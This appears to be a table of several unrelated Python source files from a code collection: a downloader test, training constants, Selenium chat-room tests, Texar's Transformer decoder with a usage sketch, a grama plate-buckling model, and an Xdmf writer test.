ext | sha | content
---|---|---|
py
|
1a5ed4d01d4dba59b0c69b838de1e2443fad8036
|
import hashlib
import aiofiles
import pytest
from aiofiles import os
from kanp.download import Downloader
from kanp.utils import get_real_download_url, get_video_info
@pytest.mark.asyncio
async def test_download():
url = "https://raw.githubusercontent.com/long2ice/kanp/dev/.dockerignore"
file = ".dockerignore.txt"
async with aiofiles.open(file, "ab+") as f:
async with Downloader(url) as downloader:
async for block in downloader:
await f.write(block)
async with aiofiles.open(file, "rb") as f:
assert hashlib.md5(await f.read()).hexdigest() == "c59066fc1c16d900c6c9275c5f4a1757"
await os.remove(file)
@pytest.mark.asyncio
async def test_get_video_info():
url = "https://cn.pornhub.com/view_video.php?viewkey=ph5efb2f208eadc"
url = get_real_download_url(url)
content_length, content_type = await get_video_info(url)
assert (content_length, content_type) == (792786244, "video/mp4")
|
py
|
1a5ed55f1747f270f97cfa708bac8d10771698eb
|
KEEP_PROB = 0.5
LEARNING_RATE = 1e-5
BATCH_SIZE = 50
PARAMETER_FILE = "checkpoint/variable.ckpt"
MAX_ITER = 50000
|
py
|
1a5ed61606e1679fe9bb90221c5c9d088912a081
|
# chat/tests.py
from channels.testing import ChannelsLiveServerTestCase
from selenium import webdriver
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support.wait import WebDriverWait
class ChatTests(ChannelsLiveServerTestCase):
serve_static = True # emulate StaticLiveServerTestCase
@classmethod
def setUpClass(cls):
super().setUpClass()
try:
# NOTE: Requires "chromedriver" binary to be installed in $PATH
cls.driver = webdriver.Chrome()
except:
super().tearDownClass()
raise
@classmethod
def tearDownClass(cls):
cls.driver.quit()
super().tearDownClass()
def test_when_chat_message_posted_then_seen_by_everyone_in_same_room(self):
try:
self._enter_chat_room('room_1')
self._open_new_window()
self._enter_chat_room('room_1')
self._switch_to_window(0)
self._post_message('hello')
WebDriverWait(self.driver, 2).until(lambda _:
'hello' in self._chat_log_value,
'Message was not received by window 1 from window 1')
self._switch_to_window(1)
WebDriverWait(self.driver, 2).until(lambda _:
'hello' in self._chat_log_value,
'Message was not received by window 2 from window 1')
finally:
self._close_all_new_windows()
def test_when_chat_message_posted_then_not_seen_by_anyone_in_different_room(self):
try:
self._enter_chat_room('room_1')
self._open_new_window()
self._enter_chat_room('room_2')
self._switch_to_window(0)
self._post_message('hello')
WebDriverWait(self.driver, 2).until(lambda _:
'hello' in self._chat_log_value,
'Message was not received by window 1 from window 1')
self._switch_to_window(1)
self._post_message('world')
WebDriverWait(self.driver, 2).until(lambda _:
'world' in self._chat_log_value,
'Message was not received by window 2 from window 2')
self.assertTrue('hello' not in self._chat_log_value,
'Message was improperly received by window 2 from window 1')
finally:
self._close_all_new_windows()
# === Utility ===
def _enter_chat_room(self, room_name):
self.driver.get(self.live_server_url + '/chat/')
ActionChains(self.driver).send_keys(room_name + '\n').perform()
WebDriverWait(self.driver, 2).until(lambda _:
room_name in self.driver.current_url)
def _open_new_window(self):
self.driver.execute_script('window.open("about:blank", "_blank");')
self.driver.switch_to_window(self.driver.window_handles[-1])
def _close_all_new_windows(self):
while len(self.driver.window_handles) > 1:
self.driver.switch_to_window(self.driver.window_handles[-1])
self.driver.execute_script('window.close();')
if len(self.driver.window_handles) == 1:
self.driver.switch_to_window(self.driver.window_handles[0])
def _switch_to_window(self, window_index):
self.driver.switch_to_window(self.driver.window_handles[window_index])
def _post_message(self, message):
ActionChains(self.driver).send_keys(message + '\n').perform()
@property
def _chat_log_value(self):
return self.driver.find_element_by_css_selector('#chat-log').get_property('value')
|
py
|
1a5ed6d5991caed951ca44281eb081c307c1db7b
|
# Copyright 2019 The Texar Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Transformer decoder.
"""
import warnings
from typing import Callable, Dict, NamedTuple, Optional, Tuple, Union
import torch
from torch import nn
from texar.torch.core import layers
from texar.torch.modules.decoders.decoder_base import (
DecoderBase, TokenEmbedder, TokenPosEmbedder, _make_output_layer)
from texar.torch.modules.decoders.decoder_helpers import (
EmbeddingHelper, Helper)
from texar.torch.modules.encoders.multihead_attention import (
Cache, MultiheadAttentionEncoder)
from texar.torch.modules.encoders.transformer_encoder import (
default_transformer_poswise_net_hparams)
from texar.torch.modules.networks.networks import FeedForwardNetwork
from texar.torch.utils import transformer_attentions as attn
from texar.torch.utils.beam_search import beam_search
from texar.torch.utils.shapes import mask_sequences
from texar.torch.utils.utils import sequence_mask
__all__ = [
'TransformerDecoderOutput',
'TransformerDecoder',
]
EmbeddingFn = Callable[[torch.LongTensor, torch.LongTensor], torch.Tensor]
class TransformerDecoderOutput(NamedTuple):
r"""The output of :class:`TransformerDecoder`.
"""
logits: torch.Tensor
r"""A :tensor:`Tensor` of shape ``[batch_size, max_time, vocab_size]``
containing the logits."""
sample_id: torch.LongTensor
r"""A :tensor:`LongTensor` of shape ``[batch_size, max_time]`` containing
the sampled token indices."""
class TransformerDecoder(DecoderBase[Cache, TransformerDecoderOutput]):
r"""Transformer decoder that applies multi-head self-attention for
sequence decoding.
It is a stack of
:class:`~texar.torch.modules.encoders.MultiheadAttentionEncoder`,
:class:`~texar.torch.modules.FeedForwardNetwork`, and residual connections.
Args:
token_embedder: An instance of :torch_nn:`Module`, or a function taking
a :tensor:`LongTensor` ``tokens`` as argument. This is the embedder
called in :meth:`embed_tokens` to convert input tokens to
embeddings.
token_pos_embedder: An instance of :torch_nn:`Module`, or a function
taking two :tensor:`LongTensor`\ s ``tokens`` and ``positions`` as
argument. This is the embedder called in :meth:`embed_tokens` to
convert input tokens with positions to embeddings.
.. note::
Only one among :attr:`token_embedder` and
:attr:`token_pos_embedder` should be specified. If neither is
specified, you must subclass :class:`TransformerDecoder` and
override :meth:`embed_tokens`.
vocab_size (int, optional): Vocabulary size. Required if
:attr:`output_layer` is `None`.
output_layer (optional): An output layer that transforms cell output
to logits. This can be:
- A callable layer, e.g., an instance of :torch_nn:`Module`.
- A tensor. A :torch_nn:`Linear` layer will be created using the
tensor as weights. The bias of the dense layer is determined
by ``hparams.output_layer_bias``. This can be used to tie the
output layer with the input embedding matrix, as proposed in
https://arxiv.org/pdf/1608.05859.pdf.
- `None`. A :torch_nn:`Linear` layer will be created based on
:attr:`vocab_size` and ``hparams.output_layer_bias``.
- If no output layer is needed at the end, set
:attr:`vocab_size` to `None` and ``output_layer`` to
:func:`~texar.torch.core.identity`.
hparams (dict or HParams, optional): Hyperparameters. Missing
hyperparameters will be set to default values. See
:meth:`default_hparams` for the hyperparameter structure and
default values.
.. document private functions
"""
# State variables used during `dynamic_decode`. Assigned in `forward`.
_state_max_decoding_length: int
_state_context: Optional[torch.LongTensor]
_state_context_sequence_length: Optional[torch.LongTensor]
_state_cache: Cache
def __init__(self,
token_embedder: Optional[TokenEmbedder] = None,
token_pos_embedder: Optional[TokenPosEmbedder] = None,
vocab_size: Optional[int] = None,
output_layer: Optional[Union[nn.Module, torch.Tensor]] = None,
hparams=None):
super().__init__(
token_embedder, token_pos_embedder,
input_time_major=False, output_time_major=False, hparams=hparams)
if token_pos_embedder is None and token_embedder is not None:
warnings.warn(
"Transformer models cannot capture positional information if "
"no positional embedding is provided.")
self._input_size = self._hparams.dim
self._output_layer, self._vocab_size = _make_output_layer(
output_layer, vocab_size, self._input_size,
self._hparams.output_layer_bias)
self.self_attns = nn.ModuleList()
self.self_attn_layer_norm = nn.ModuleList()
self.enc_dec_attns = nn.ModuleList()
self.end_dec_attn_layer_norm = nn.ModuleList()
self.poswise_networks = nn.ModuleList()
self.poswise_layer_norm = nn.ModuleList()
if self._hparams.use_gpt_config:
eps = 1e-5
else:
eps = 1e-12
for _ in range(self._hparams.num_blocks):
attn_module = MultiheadAttentionEncoder(
self._input_size, self._hparams.multihead_attention)
if self._hparams.dim != attn_module.output_size:
raise ValueError("The output dimension of "
"MultiheadEncoder should be equal "
"to the dim of TransformerDecoder")
self.self_attns.append(attn_module)
self.self_attn_layer_norm.append(
nn.LayerNorm(self._input_size, eps=eps))
attn_module = MultiheadAttentionEncoder(
self._input_size, self._hparams.multihead_attention)
if self._hparams.dim != attn_module.output_size:
raise ValueError("The output dimension of "
"MultiheadEncoder should be equal "
"to the dim of TransformerDecoder")
self.enc_dec_attns.append(attn_module)
self.end_dec_attn_layer_norm.append(
nn.LayerNorm(self._input_size, eps=eps))
poswise_network = FeedForwardNetwork(
hparams=self._hparams.poswise_feedforward)
if (poswise_network.hparams.layers[-1]['kwargs']['out_features']
!= self._hparams.dim):
raise ValueError("The output dimension of "
"FeedForwardNetwork should be equal "
"to the dim of TransformerDecoder")
self.poswise_networks.append(poswise_network)
self.poswise_layer_norm.append(
nn.LayerNorm(self._input_size, eps=eps))
self.final_layer_norm = nn.LayerNorm(self._input_size, eps=eps)
self.embed_dropout = nn.Dropout(self._hparams.embedding_dropout)
self.residual_dropout = nn.Dropout(self._hparams.residual_dropout)
if self._hparams.initializer:
# TODO: This might be different from what TensorFlow does
initialize = layers.get_initializer(self._hparams.initializer)
assert initialize is not None
# Do not re-initialize LayerNorm modules.
for name, param in self.named_parameters():
if name.split(".")[-1] == "weight" and "layer_norm" not in name:
initialize(param)
@staticmethod
def default_hparams():
r"""Returns a dictionary of hyperparameters with default values.
.. code-block:: python
{
# Same as in TransformerEncoder
"num_blocks": 6,
"dim": 512,
"use_gpt_config": False,
"embedding_dropout": 0.1,
"residual_dropout": 0.1,
"poswise_feedforward": default_transformer_poswise_net_hparams,
"multihead_attention": {
'name': 'multihead_attention',
'num_units': 512,
'output_dim': 512,
'num_heads': 8,
'dropout_rate': 0.1,
'use_bias': False,
},
"initializer": None,
"name": "transformer_decoder"
# Additional for TransformerDecoder
"embedding_tie": True,
"output_layer_bias": False,
"max_decoding_length": int(1e10),
}
Here:
`"num_blocks"`: int
Number of stacked blocks.
`"dim"`: int
Hidden dimension of the encoder.
`"use_gpt_config"`: bool
Whether to follow the `eps` setting of OpenAI GPT.
`"embedding_dropout"`: float
Dropout rate of the input word and position embeddings.
`"residual_dropout"`: float
Dropout rate of the residual connections.
`"poswise_feedforward"`: dict
Hyperparameters for a feed-forward network used in residual
connections.
Make sure the dimension of the output tensor is equal to ``dim``.
See
:func:`~texar.torch.modules.default_transformer_poswise_net_hparams`
for details.
`"multihead_attention"`: dict
Hyperparameters for the multi-head attention strategy.
Make sure the ``output_dim`` in this module is equal to ``dim``.
See :class:`~texar.torch.modules.MultiheadAttentionEncoder`
for details.
`"initializer"`: dict, optional
Hyperparameters of the default initializer that initializes
variables created in this module.
See :func:`~texar.torch.core.get_initializer` for details.
`"embedding_tie"`: bool
Whether to use the word embedding matrix as the output layer
that computes logits. If `False`, a new dense layer is created.
`"output_layer_bias"`: bool
Whether to use bias to the output layer.
`"max_decoding_length"`: int
The maximum allowed number of decoding steps.
Set to a very large number to avoid the length constraint.
Ignored if provided in :meth:`forward` or ``"train_greedy"``
decoding is used.
`"name"`: str
Name of the module.
"""
dim = 512
return {
'num_blocks': 6,
'dim': dim,
'use_gpt_config': False,
'embedding_tie': True,
'output_layer_bias': False,
'max_decoding_length': int(1e10),
'embedding_dropout': 0.1,
'residual_dropout': 0.1,
'poswise_feedforward': default_transformer_poswise_net_hparams(dim),
'multihead_attention': {
'name': 'multihead_attention',
'num_units': 512,
'num_heads': 8,
'dropout_rate': 0.1,
'output_dim': 512,
'use_bias': False,
},
'initializer': None,
'name': "transformer_decoder",
}
def _inputs_to_outputs(self, inputs: torch.Tensor,
cache: Cache) -> Tuple[torch.Tensor, Cache]:
r"""Returns the outputs of one decoding step (for example,
the predicted logits of the next token).
:attr:`inputs` should be of shape ``[batch_size, dim]``.
Returns:
A tuple of logits and updated cache. Logits are of shape
``[batch_size, vocab_size]``.
"""
outputs = self._self_attention_stack(
inputs.unsqueeze(1), memory=cache['memory'], cache=cache)
outputs = self._output_layer(outputs)
outputs = outputs.squeeze(1)
return outputs, cache
def forward(self, # type: ignore
inputs: Optional[torch.Tensor] = None,
sequence_length: Optional[torch.LongTensor] = None,
memory: Optional[torch.Tensor] = None,
memory_sequence_length: Optional[torch.LongTensor] = None,
memory_attention_bias: Optional[torch.Tensor] = None,
context: Optional[torch.Tensor] = None,
context_sequence_length: Optional[torch.LongTensor] = None,
helper: Optional[Helper] = None,
decoding_strategy: str = 'train_greedy',
max_decoding_length: Optional[int] = None,
impute_finished: bool = False,
infer_mode: Optional[bool] = None,
beam_width: Optional[int] = None,
length_penalty: float = 0.,
**kwargs) \
-> Union[
TransformerDecoderOutput,
Tuple[TransformerDecoderOutput, torch.LongTensor],
Dict[str, torch.Tensor]]:
r"""Performs decoding.
The interface is very similar to that of RNN decoders
(:class:`texar.torch.modules.RNNDecoderBase`). In particular,
the function provides **3 ways** to specify the decoding method, with
varying flexibility:
1. The :attr:`decoding_strategy` argument.
- **"train_greedy"**: decoding in teacher-forcing fashion (i.e.,
feeding ground truth to decode the next step), and for each step
sample is obtained by taking the `argmax` of logits.
Argument :attr:`inputs` is required for this strategy.
:attr:`sequence_length` is optional.
- **"infer_greedy"**: decoding in inference fashion (i.e., feeding
`generated` sample to decode the next step), and for each step
sample is obtained by taking the `argmax` of logits.
Arguments :attr:`(start_tokens, end_token)` are
required for this strategy, and argument
:attr:`max_decoding_length` is optional.
- **"infer_sample"**: decoding in inference fashion, and for each
step sample is obtained by `random sampling` from the logits.
Arguments :attr:`(start_tokens, end_token)` are required for this
strategy, and argument :attr:`max_decoding_length` is optional.
This argument is used only when arguments :attr:`helper` and
:attr:`beam_width` are both `None`.
2. The :attr:`helper` argument: An instance of subclass of
:class:`texar.torch.modules.decoders.Helper`.
This provides a superset of the decoding strategies above.
The interface is the same as in RNN decoders.
Please refer to :meth:`texar.torch.modules.RNNDecoderBase.forward`
for detailed usage and examples.
Note that, here, though using a
:class:`~texar.torch.decoder.TrainingHelper` corresponding to the
``"train_greedy"`` strategy above, the implementation is *slower*
than directly setting ``decoding_strategy="train_greedy"`` (though
output results are the same).
Argument :attr:`max_decoding_length` is optional.
3. **Beam search**: set :attr:`beam_width` to use beam search decoding.
Arguments :attr:`(start_tokens, end_token)` are required,
and argument :attr:`max_decoding_length` is optional.
Args:
memory (optional): The memory to attend, e.g., the output of an RNN
encoder. A :tensor:`Tensor` of shape
``[batch_size, memory_max_time, dim]``.
memory_sequence_length (optional): A :tensor:`Tensor` of shape
``[batch_size]`` containing the sequence lengths for the batch
entries in memory. Used to create an attention bias if
:attr:`memory_attention_bias` is not given. Ignored if
:attr:`memory_attention_bias` is provided.
memory_attention_bias (optional): A :tensor:`Tensor` of shape
``[batch_size, num_heads, memory_max_time, dim]``.
An attention bias typically sets the value of a padding
position to a large negative value for masking. If not given,
:attr:`memory_sequence_length` is used to automatically
create an attention bias.
inputs (optional): Input tensors for teacher forcing decoding.
Used when :attr:`decoding_strategy` is set to
``"train_greedy"``, or when `hparams`-configured helper is used.
The :attr:`inputs` is a :tensor:`LongTensor` used as indices to
look up embeddings and feed in the decoder. For example, if
:attr:`embedder` is an instance of
:class:`~texar.torch.modules.WordEmbedder`, then :attr:`inputs`
is usually a 2D int Tensor `[batch_size, max_time]` (or
`[max_time, batch_size]` if `input_time_major` == `True`)
containing the token indexes.
sequence_length (optional): A :tensor:`LongTensor` of shape
``[batch_size]``, containing the sequence length of
:attr:`inputs`. Tokens beyond the respective sequence length are
masked out.
Used when :attr:`decoding_strategy` is set to
``"train_greedy"``.
decoding_strategy (str): A string specifying the decoding
strategy, including ``"train_greedy"``, ``"infer_greedy"``,
``"infer_sample"``.
Different arguments are required based on the
strategy. See above for details. Ignored if
:attr:`beam_width` or :attr:`helper` is set.
beam_width (int): Set to use beam search. If given,
:attr:`decoding_strategy` is ignored.
length_penalty (float): Length penalty coefficient used in beam
search decoding. Refer to https://arxiv.org/abs/1609.08144
for more details.
It should be larger if longer sentences are desired.
context (optional): An :tensor:`LongTensor` of shape
``[batch_size, length]``, containing the starting tokens for
decoding. If context is set, ``start_tokens`` of the
:class:`~texar.torch.modules.Helper` will be ignored.
context_sequence_length (optional): Specify the length of context.
max_decoding_length (int, optional): The maximum allowed number of
decoding steps.
If `None` (default), use ``"max_decoding_length"`` defined in
:attr:`hparams`. Ignored in ``"train_greedy"`` decoding.
impute_finished (bool): If `True`, then states for batch
entries which are marked as finished get copied through and
the corresponding outputs get zeroed out. This causes some
slowdown at each time step, but ensures that the final state
and outputs have the correct values and that backprop ignores
time steps that were marked as finished. Ignored in
``"train_greedy"`` decoding.
helper (optional): An instance of
:class:`texar.torch.modules.decoders.Helper`
that defines the decoding strategy. If given,
``decoding_strategy`` and helper configurations in
:attr:`hparams` are ignored.
infer_mode (optional): If not `None`, overrides mode given by
:attr:`self.training`.
Returns:
- For **"train_greedy"** decoding, returns an instance of
:class:`~texar.torch.modules.TransformerDecoderOutput` which
contains `sample_id` and `logits`.
- For **"infer_greedy"** and **"infer_sample"** decoding or
decoding with :attr:`helper`, returns
a tuple ``(outputs, sequence_lengths)``, where ``outputs`` is an
instance of :class:`~texar.torch.modules.TransformerDecoderOutput`
as in `"train_greedy"`, and ``sequence_lengths`` is a
:tensor:`LongTensor` of shape ``[batch_size]`` containing the
length of each sample.
- For **beam search** decoding, returns a ``dict`` containing keys
``"sample_id"`` and ``"log_prob"``.
- ``"sample_id"`` is a :tensor:`LongTensor` of shape
``[batch_size, max_time, beam_width]`` containing generated
token indexes. ``sample_id[:,:,0]`` is the highest-probable
sample.
- ``"log_prob"`` is a :tensor:`Tensor` of shape
``[batch_size, beam_width]`` containing the log probability
of each sequence sample.
"""
if memory is not None:
if memory_attention_bias is None:
if memory_sequence_length is None:
raise ValueError(
"`memory_sequence_length` is required if "
"`memory_attention_bias` is not given.")
enc_padding = 1 - sequence_mask(
memory_sequence_length, memory.size(1),
dtype=torch.float32)
memory_attention_bias = attn.attention_bias_ignore_padding(
enc_padding)
# record the context, which will be used in step function
# for dynamic_decode
if context is not None:
if context_sequence_length is None:
raise ValueError("'context_sequence_length' must not be None"
"when 'context' is specified.")
self._state_context = context[:, 1:]
self._state_context_sequence_length = context_sequence_length - 1
else:
self._state_context = None
self._state_context_sequence_length = None
# Faster code path for teacher-forcing training
if (helper is None and beam_width is None and
decoding_strategy == 'train_greedy'):
if inputs is None:
raise ValueError("'input' must not be none "
"when using 'train_greedy' decoding strategy.")
times = torch.arange(
inputs.size(1), dtype=torch.long, device=inputs.device)
times = times.unsqueeze(0).expand(inputs.size(0), -1)
inputs = self.embed_tokens(inputs, times)
if sequence_length is not None:
inputs = mask_sequences(inputs, sequence_length)
decoder_self_attention_bias = (
attn.attention_bias_lower_triangle(inputs.size(1)))
decoder_output = self._self_attention_stack(
inputs, memory, decoder_self_attention_bias,
memory_attention_bias, cache=None)
logits = self._output_layer(decoder_output)
sample_id = torch.argmax(logits, dim=-1)
return TransformerDecoderOutput(logits, sample_id)
# Inference code path.
if max_decoding_length is None:
max_decoding_length = self._hparams.max_decoding_length
self._state_max_decoding_length = max_decoding_length
if beam_width is None or beam_width == 1: # Inference-like decoding
# Prepare helper
if helper is None:
kwargs.update(decoding_strategy=decoding_strategy)
if context is not None:
kwargs.update(start_tokens=context[:, 0])
helper = self._create_or_get_helper(infer_mode, **kwargs)
assert isinstance(helper, EmbeddingHelper)
self._state_cache = self._init_cache(
memory, memory_attention_bias,
beam_search_decoding=False, batch_size=helper.batch_size)
if context is not None:
assert self._state_context is not None
pad_length = max_decoding_length - self._state_context.size(1)
if pad_length > 0:
self._state_context = torch.cat((
self._state_context,
self._state_context.new_zeros(
self._state_context.size(0), pad_length)
), dim=1)
outputs, cache, sequence_lengths = self.dynamic_decode(
helper, inputs=None, sequence_length=None,
initial_state=None, max_decoding_length=max_decoding_length,
impute_finished=impute_finished)
del cache # not used
if context is not None:
# Here the length of sample_id will be larger than that
# of logits by 1, because there will be an additional
# start_token in the returned sample_id.
# The start_id should be the first token of the
# given context.
start_tokens = context[:, 0]
outputs = TransformerDecoderOutput(
logits=outputs.logits,
sample_id=torch.cat([
start_tokens.unsqueeze(1),
outputs.sample_id
], dim=1))
sequence_lengths = sequence_lengths + 1
return outputs, sequence_lengths
else: # Beam-search decoding
# Ignore `decoding_strategy` and assume `helper` is not set.
if helper is not None:
raise ValueError("Must not set 'beam_width' and 'helper' "
"simultaneously.")
if context is not None:
start_tokens = context[:, 0]
else:
if 'start_tokens' not in kwargs:
raise ValueError(
"'start_tokens' must be specified when using"
"beam search decoding.")
start_tokens = kwargs['start_tokens']
_batch_size = start_tokens.size(0)
self._state_cache = self._init_cache(
memory, memory_attention_bias,
beam_search_decoding=True,
batch_size=_batch_size)
end_token: int = kwargs.get('end_token') # type: ignore
# The output format is different when running beam search.
sample_id, log_prob = self.beam_decode(
start_tokens,
end_token,
embedding_fn=self.embed_tokens,
beam_width=beam_width,
length_penalty=length_penalty,
decode_length=max_decoding_length)
return {
'sample_id': sample_id,
'log_prob': log_prob
}
def _self_attention_stack(
self, inputs: torch.Tensor,
memory: Optional[torch.Tensor],
decoder_self_attention_bias: Optional[torch.Tensor] = None,
memory_attention_bias: Optional[torch.Tensor] = None,
cache: Optional[Cache] = None) -> torch.Tensor:
r"""Forward through the stacked multi-head attentions.
"""
inputs = self.embed_dropout(inputs)
if cache is not None:
if memory is not None:
memory_attention_bias = cache['memory_attention_bias']
else:
assert decoder_self_attention_bias is not None
x = inputs
for i in range(self._hparams.num_blocks):
layer_cache = cache['layers'][i] if cache is not None else None
selfatt_output = self.self_attns[i](
queries=self.self_attn_layer_norm[i](x),
memory=None,
memory_attention_bias=decoder_self_attention_bias,
cache=layer_cache)
x = x + self.residual_dropout(selfatt_output)
if memory is not None:
encdec_output = self.enc_dec_attns[i](
queries=self.end_dec_attn_layer_norm[i](x),
memory=memory,
memory_attention_bias=memory_attention_bias)
x = x + self.residual_dropout(encdec_output)
sub_output = self.poswise_networks[i](self.poswise_layer_norm[i](x))
x = x + self.residual_dropout(sub_output)
return self.final_layer_norm(x)
def _init_cache(self, memory: Optional[torch.Tensor],
memory_attention_bias: Optional[torch.Tensor],
beam_search_decoding: bool,
batch_size: int) -> Cache:
r"""Returns an initialized cache.
In order to support both inference-like decoding and beam-search
decoding, the elements of each layer must be initialized and extended
as different structures, respectively. Specifically, for inference-like
decoding, a simple list is used; for beam-search decoding, a
:tensor:`Tensor` of shape ``[batch_size, current_steps, num_units]``
is maintained, where ``current_steps`` is the number of steps currently
decoded.
"""
device = next(self.parameters()).device
def _create_ta():
return []
def _create_empty_tensor():
ret = torch.zeros(
batch_size, 0, self._hparams.multihead_attention.num_units,
dtype=torch.float, device=device)
return ret
_create_fn = (_create_empty_tensor if beam_search_decoding
else _create_ta)
cache: Cache = {
'memory': memory,
'memory_attention_bias': memory_attention_bias,
'layers': [{
'keys': _create_fn(),
'values': _create_fn(),
} for _ in range(self._hparams.num_blocks)],
}
return cache
def beam_decode(self, start_tokens: torch.LongTensor, end_token: int,
embedding_fn: Callable[
[torch.LongTensor, torch.LongTensor], torch.Tensor],
decode_length: int = 256, beam_width: int = 5,
length_penalty: float = 0.6) \
-> Tuple[torch.Tensor, torch.Tensor]:
def _symbols_to_logits_fn(ids, cache):
batch_size = ids.size(0)
step = ids.size(-1) - 1
times = ids.new_full((batch_size,), step)
inputs = embedding_fn(ids[:, -1], times)
return self._inputs_to_outputs(inputs, cache)
assert self._vocab_size is not None
outputs, log_prob = beam_search(
_symbols_to_logits_fn,
start_tokens,
beam_width,
decode_length,
self._vocab_size,
length_penalty,
states=self._state_cache,
eos_id=end_token)
# Ignores <BOS>
outputs = outputs[:, :, 1:]
# shape = [batch_size, seq_length, beam_width]
outputs = outputs.permute(0, 2, 1)
return outputs, log_prob
@property
def output_size(self) -> int:
r"""Output size of one step.
"""
return self._input_size
def initialize(self, helper: Helper, inputs: Optional[torch.Tensor],
sequence_length: Optional[torch.LongTensor],
initial_state: Optional[Cache]) \
-> Tuple[torch.ByteTensor, torch.Tensor, Cache]:
initial_finished, initial_inputs = helper.initialize(
self.embed_tokens, inputs, sequence_length)
state = initial_state or self._state_cache
return initial_finished, initial_inputs, state
def step(self, helper: Helper, time: int,
inputs: torch.Tensor, state: Optional[Cache]) \
-> Tuple[TransformerDecoderOutput, Cache,
torch.Tensor, torch.ByteTensor]:
assert state is not None
outputs, state = self._inputs_to_outputs(inputs, state)
sample_ids = helper.sample(time=time, outputs=outputs)
if self._state_context is not None:
assert self._state_context_sequence_length is not None
sample_ids = torch.where(
self._state_context_sequence_length > time,
self._state_context[:, time],
sample_ids)
if time + 1 == self._state_max_decoding_length:
# Maximum decoding length reached, mark all batches as finished.
# This requires special handling because performing lookup on
# position embeddings with `time + 1` may result in IndexError.
finished = torch.ones_like(sample_ids, dtype=torch.uint8)
# Since `next_inputs` will not be used, simply create a null tensor.
next_inputs = torch.empty(0)
else:
finished, next_inputs = helper.next_inputs(
self.embed_tokens, time, outputs, sample_ids)
next_state = state
outputs = TransformerDecoderOutput(
logits=outputs,
sample_id=sample_ids)
return outputs, next_state, next_inputs, finished
def finalize(self, # type: ignore
outputs: TransformerDecoderOutput,
final_state: Optional[Cache],
sequence_lengths: torch.LongTensor) \
-> Tuple[TransformerDecoderOutput, Optional[Cache]]:
# Clear state variables at end of decoding.
del self._state_max_decoding_length
del self._state_context
del self._state_context_sequence_length
del self._state_cache
return super().finalize(outputs, final_state, sequence_lengths)
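# ---------------------------------------------------------------------------
# Usage sketch (added for illustration, not part of the original module).
# The `forward` docstring above describes teacher-forcing ("train_greedy"),
# helper-based inference, and beam-search decoding.  The snippet below shows
# how the decoder might be wired up for the first and the last of these; the
# embedders, vocabulary size, memory tensor, and toy sizes are assumptions
# made for the example, not values taken from the original code.
if __name__ == "__main__":
    vocab_size, dim, batch, steps = 100, 512, 2, 7  # assumed toy sizes
    token_embed = nn.Embedding(vocab_size, dim)
    pos_embed = nn.Embedding(1024, dim)

    def token_pos_embedder(tokens, positions):
        # Combine word and position embeddings, as expected by `embed_tokens`.
        return token_embed(tokens) + pos_embed(positions)

    decoder = TransformerDecoder(
        token_pos_embedder=token_pos_embedder,
        vocab_size=vocab_size,
        hparams={"dim": dim},
    )

    memory = torch.randn(batch, 5, dim)      # stand-in for encoder outputs
    memory_len = torch.tensor([5, 4])
    inputs = torch.randint(vocab_size, (batch, steps))
    lengths = torch.tensor([steps, steps - 2])

    # Teacher forcing ("train_greedy"): returns a TransformerDecoderOutput.
    train_out = decoder(inputs=inputs, sequence_length=lengths,
                        memory=memory, memory_sequence_length=memory_len,
                        decoding_strategy="train_greedy")
    print(train_out.logits.shape)  # [batch, steps, vocab_size]

    # Beam search: returns a dict with "sample_id" and "log_prob".
    decoder.eval()
    beam_out = decoder(memory=memory, memory_sequence_length=memory_len,
                       start_tokens=torch.zeros(batch, dtype=torch.long),
                       end_token=1, beam_width=3, max_decoding_length=10)
    print(beam_out["sample_id"].shape)  # [batch, max_time, beam_width]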
|
py
|
1a5ed85aeadbcd107aa234f83013db65b301facd
|
import grama as gr
import numpy as np
## Load data for RV model
from grama.data import df_stang
## Functions
def fun_critical(x):
E, mu, t, h = x
return np.pi ** 2 * E / 12 / (1 - mu ** 2) * (t / h) ** 2
var_critical = ["E", "mu", "t", "h"]
out_critical = ["sig_cr"]
def fun_applied(x):
L, w, t = x
return L / w / t
var_applied = ["L", "w", "t"]
out_applied = ["sig_app"]
def fun_limit(x):
sig_cr, sig_app = x
return sig_cr - sig_app
var_limit = ["sig_cr", "sig_app"]
out_limit = ["safety"]
## Build model
md_plate = (
gr.Model("Plate under buckling load")
>> gr.cp_function(
fun=fun_critical, var=var_critical, out=out_critical, name="Critical"
)
>> gr.cp_function(fun=fun_applied, var=var_applied, out=out_applied, name="Applied")
>> gr.cp_function(fun=fun_limit, var=var_limit, out=out_limit, name="Safety")
>> gr.cp_bounds( # Deterministic variables
t=(0.03, 0.12), # Thickness
w=(6, 18), # Width
h=(6, 18), # Height
L=(2.5e-1, 4.0e-1), # Load
)
>> gr.cp_marginals( # Random variables
E=gr.marg_gkde(df_stang.E), mu=gr.marg_gkde(df_stang.mu)
)
>> gr.cp_copula_gaussian(df_data=df_stang)
) # Dependence
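# ---------------------------------------------------------------------------
# Sanity check (added for illustration, not part of the original script):
# evaluate the three limit-state functions directly at one nominal point.
# The deterministic values below are picked inside the stated bounds, and the
# elasticity and Poisson ratio are plausible assumed values, not numbers used
# by the original model.
if __name__ == "__main__":
    E_nom, mu_nom = 10.5e3, 0.32      # assumed elasticity and Poisson ratio
    t_nom, h_nom, w_nom, L_nom = 0.06, 12.0, 12.0, 3.0e-1

    sig_cr = fun_critical([E_nom, mu_nom, t_nom, h_nom])
    sig_app = fun_applied([L_nom, w_nom, t_nom])
    print("critical stress:", sig_cr)
    print("applied stress: ", sig_app)
    print("safety margin:  ", fun_limit([sig_cr, sig_app]))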
|
py
|
1a5ed8ac75f53f29554dbe8c2d046c9149f540c6
|
from Xdmf import *
if __name__ == "__main__":
primaryDomain = XdmfDomain.New()
testGrid = XdmfUnstructuredGrid.New()
primaryDomain.insert(testGrid)
testGeometry = XdmfGeometry.New()
for i in range(0, 11):
testGeometry.pushBackAsInt32(i)
testGrid.setGeometry(testGeometry)
testTopology = XdmfTopology.New()
testGrid.setTopology(testTopology)
arrayWriter = XdmfWriter.New("array.xmf")
primaryDomain.accept(arrayWriter)
|
py
|
1a5ed951d0e9645466af2b855c75ce01d1d4ba8e
|
import matplotlib.pyplot as plt
import numpy as np
